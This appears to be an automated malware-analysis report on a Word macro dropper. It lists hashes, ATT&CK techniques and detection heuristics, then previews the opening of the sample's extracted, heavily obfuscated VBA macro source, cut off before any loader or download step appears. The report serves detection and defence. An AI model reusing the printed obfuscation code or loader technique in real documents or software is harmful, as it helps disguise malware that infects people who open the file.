Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 058c184aa7406704…

MALICIOUS

Office (OLE)

Size: 200.0 KB
Created: 2018-04-17 23:59:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: c8793b70cb2c89db726fac9a0313dfa8
SHA-1: 3dbb047c031bd72a1a44d93b1810675d497ed799
SHA-256: 058c184aa74067047be4a404be9bcdc0d625f1fc74a1aa5ccc8aa6238aa415d3
Risk Score: 302

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1140 Deobfuscate/Decode Files or Information

The sample contains heavily obfuscated VBA macros, including an auto-exec loader that calls CreateObject and GetObject, a shape typical of a dropper. The ClamAV signature 'Doc.Dropper.Emodldr-6755244-0' independently classifies it as a dropper. The obfuscation of the VBA code together with its use of execution functions suggests it is designed to download and execute a secondary payload.

Heuristics (8)

  • ClamAV: Doc.Dropper.Emodldr-6755244-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Emodldr-6755244-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 52764 bytes
SHA-256: 4bfa175dd4d1a36a8d2c6b0a480ebe480429951923dad52946d8dcc2bfccda93
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function MeyQzQ(iKzjizN As Integer, JnDpYb As Double, HFMocwH As Double, MxPSyiw As String) As String
    Qfjxcj = "]cydqFugW(*lFk" + "$I_G)C$x_ycu@" + "Z?GiS*%dJ-@f$DYmJ"
    pFUNre = StrReverse("G]lo#KzECGy")
    For QamGVx = 0 To 32
        pFUNre = 211 - 1689 - 1045
        pFUNre = Right("#@[jHH-.JsHptP", 4)
        GHlzq = RTrim(".^HS.*lejc^OCkw(VVy")
        pFUNre = Space(3)
        pFUNre = StrReverse("xDBQDalhMyxbMfuKUnY")
        eGkcOhgC = 893 + 1406 + 787
        pFUNre = "xL) lqp$[zRF(tkI" + "KKbKM?FP$LN" + "qTTuLWPK&RH"
        Qfjxcj = "_&Gbza(zME[DlHP" + "vG]ixAb$^B" + "Q^Rq]mmtc(AlRM"
        rxXUknI = "jFhfZsVwCkLZA*qw%" + "QVXpe#GP#[vu K-J" + " zmH]yGIZ#YPs"
    Next QamGVx

    GHlzq = RTrim("bBcqGZ(Zuv.")
    YpBmS = StrReverse("^mY?aWE#WgiL%bz")
    vAQIH = 1271 - 104 - 1014
    pFUNre = RTrim("( wjVxNy!Yqa*Ai")
    GHlzq = Left("QaGQz#aQvgxE-lV", 5)
    YpBmS = LTrim("kv]DSnVpVZ]O@EL-CO")
    gtZBYHX = 751 + 1862 + 1868
    YpBmS = UCase("qqH-WJc]h-rTNZhvqKBB")
    vAQIH = RTrim("nTCD#M@W-q&")
    eGkcOhgC = UCase(")^$*]S]vST #M!aPAV")
    GHlzq = 941 - 1713 - 1571
    For RRLSHM = 0 To 356
        GHlzq = UCase("v AuZ(.W(G%?dUqYr^Ff")
        Qfjxcj = UCase("cat&&[ XKYEo")
    Next RRLSHM

    YpBmS = Left("mpJUcEnm)_TGC", 2)
    Qfjxcj = Space(17)
    gtZBYHX = "yU#ptamo*gPL(w_n%Kn" + "N!cyZ%JK%CHLPEuVl" + "r[h[Qmk@KhI)]bOy"
    eGkcOhgC = Left("lw(PM ddHx?ZyRS", 3)
    eGkcOhgC = RTrim("Wd)c&CMT nJ")
    eGkcOhgC = "zucacM_mzACHek^P" + "aSoLNJxfy-jE@WBDh" + "ZBRZpBFc[)WMj"
    GHlzq = StrReverse("tEpnc#rUjiG?Qc%-_-sA")
    gtZBYHX = "p][[&#%zNiJ" + "Vj(LYC%-*h@dZgU.V.b" + "o(-OVVjAxFvx@tQbG"
    YpBmS = StrReverse("FIBduyIL!C")
    vAQIH = 960 - 1217 - 1231
    MeyQzQ = "zpiTIfTsorEiiGNVbAotuqxzW"
End Function

Private Sub HLhqJS(xchKSrf As String, hvbtaWC As Double)
    For GGFdcR = 0 To 266
        gtZBYHX = UCase("!^^fXDDFemMqwstBm@")
        pFUNre = UCase("X$@p.^OQZ!m?pIjPbtb")
        vAQIH = StrReverse("f@a(i$C&nl[R")
        gtZBYHX = LTrim("dfJcJG&%T_c-")
        gtZBYHX = StrReverse("[!TJ#ysmPWg")
        Qfjxcj = Right("h-UM$EF&&O@rB%", 5)
        vAQIH = 1570 - 519 - 146
        gtZBYHX = "@Yl_?*GvZ%%ZTUY" + "OUCcsDWRW&mXbmKv]" + "UXV(HX!_)o#)J]"
        gtZBYHX = LTrim(".bj!_qafrbrZbiDZ!")
        YpBmS = "EE(wfQ$YnpECDLm*" + "EIRnCgy-z-lf" + "C_so)qflD.GKX(^qZ"
    Next GGFdcR

    pFUNre = "[f*HleOLbLVy@V" + "f]T*_xybZMGuvKdFBcT" + "_sQzAqJ]vau$z"
    rxXUknI = 413 + 1535 + 603
    GHlzq = 1938 - 294 - 757
    rxXUknI = Right("d#qokcgpo%", 5)
    Qfjxcj = Space(18)
    GHlzq = LTrim("arTgZcy F]c-bGmsXX")
    rxXUknI = Space(7)
    GHlzq = Space(3)
    YpBmS = UCase("xIl@DmXX!hp")
    GHlzq = RTrim("[xps)Jv#g.tia@^Puvu")
    eGkcOhgC = LTrim("EkI^Nf)ElKP")
    GHlzq = 1003 + 884 + 1067
    For gNRIpP = 0 To 252
        Qfjxcj = "D.IxFSl?!v[" + "HhbKoj -[Lc_MDR[-i" + "#EcF]zbMBh*@"
        GHlzq = RTrim("JSAzd])_alWTTscfe%r")
    Next gNRIpP

    Qfjxcj = Left("MRN) -)UZrxRMVk[%[XY", 3)
    GHlzq = Right("lILk.xm@@aKU", 4)
    YpBmS = RTrim("NkgQ(C-nKx")
    vAQIH = Left("JzvY&&Zk^f$&ve", 4)
    While smjazU < 267
        gtZBYHX = UCase("?$ocXb&JJ&Fb%w")
        GHlzq = 887 + 1079 + 489
        vAQIH = RTrim("u_kHzPQRJM[A")
        YpBmS = "mdselLM#YRfb" + "p*hAsIQz%^PNo-BcNx#" + "]gm_jFeFfnjP"
        vAQIH = StrReverse("-.W.izyehXgXD")
        smjazU = smjazU + 1
    Wend

    vAQIH = LTrim("vkkMYvZI)?")
    While loneNn < 229
        YpBmS = LTrim("PpgYuRYmUquW^Wy")
        Qfjxcj = LTrim("Chxuzk@]vcBl*kw")
        YpBmS = RTrim("ekR-zBMnVfZWQ)YU-djs")
        YpBmS = LTrim(".wylcLEy]G]QgN.*")
        vAQIH = Left("[nBrpHGe.@P", 3)
        GHlzq = Right("Z!ehr$^Qb#r^vDP%", 4)
        loneNn = lon
... (truncated)